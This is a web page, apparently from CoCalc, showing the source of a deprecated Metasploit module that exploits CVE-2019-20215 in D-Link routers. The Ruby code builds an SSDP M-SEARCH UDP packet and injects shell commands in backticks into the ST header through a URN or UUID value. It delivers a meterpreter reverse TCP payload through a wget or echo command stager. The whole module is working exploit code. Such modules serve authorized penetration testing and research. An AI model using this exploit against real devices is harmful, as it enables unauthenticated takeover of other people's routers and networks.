CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Udp

10
  include Msf::Exploit::CmdStager

11
  include Msf::Module::Deprecated

12


13
  deprecated(Date.new(2024, 12, 1), 'Use `exploit/linux/upnp/dlink_upnp_msearch_exec` instead')

14


15
  def initialize(info = {})

16
    super(update_info(info,

17
      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',

18
      'Description' => %q{

19
        D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.

20
      },

21
      'Author'      =>

22
        [

23
          's1kr10s',

24
          'secenv'

25
        ],

26
      'License'     => MSF_LICENSE,

27
      'References'  =>

28
        [

29
          ['CVE', '2019-20215'],

30
          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']

31
        ],

32
      'DisclosureDate' => '2019-12-24',

33
      'Privileged'     => true,

34
      'Platform'       => 'linux',

35
      'Arch'        => ARCH_MIPSBE,

36
      'DefaultOptions' =>

37
        {

38
            'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',

39
            'CMDSTAGER::FLAVOR' => 'wget',

40
            'RPORT' => '1900'

41
        },

42
      'Targets'        =>

43
        [

44
          [ 'Auto',	{ } ],

45
        ],

46
      'CmdStagerFlavor' => %w{ echo wget },

47
      'DefaultTarget'  => 0

48
      ))

49


50
  register_options(

51
    [

52
      Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])

53
    ])

54
  end

55


56
  def exploit

57
    execute_cmdstager(linemax: 1500)

58
  end

59


60
  def execute_command(cmd, opts)

61
    type = datastore['VECTOR']

62
    if type == "URN"

63
      print_status("Target Payload URN")

64
      val = "urn:device:1;`#{cmd}`"

65
    else

66
      print_status("Target Payload UUID")

67
      val = "uuid:`#{cmd}`"

68
    end

69


70
    connect_udp

71
    header = "M-SEARCH * HTTP/1.1\r\n"

72
    header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"

73
    header << "ST:#{val}\r\n"

74
    header << "Man:\"ssdp:discover\"\r\n"

75
    header << "MX:2\r\n\r\n"

76
    udp_sock.put(header)

77
    disconnect_udp

78
  end

79
end

80


81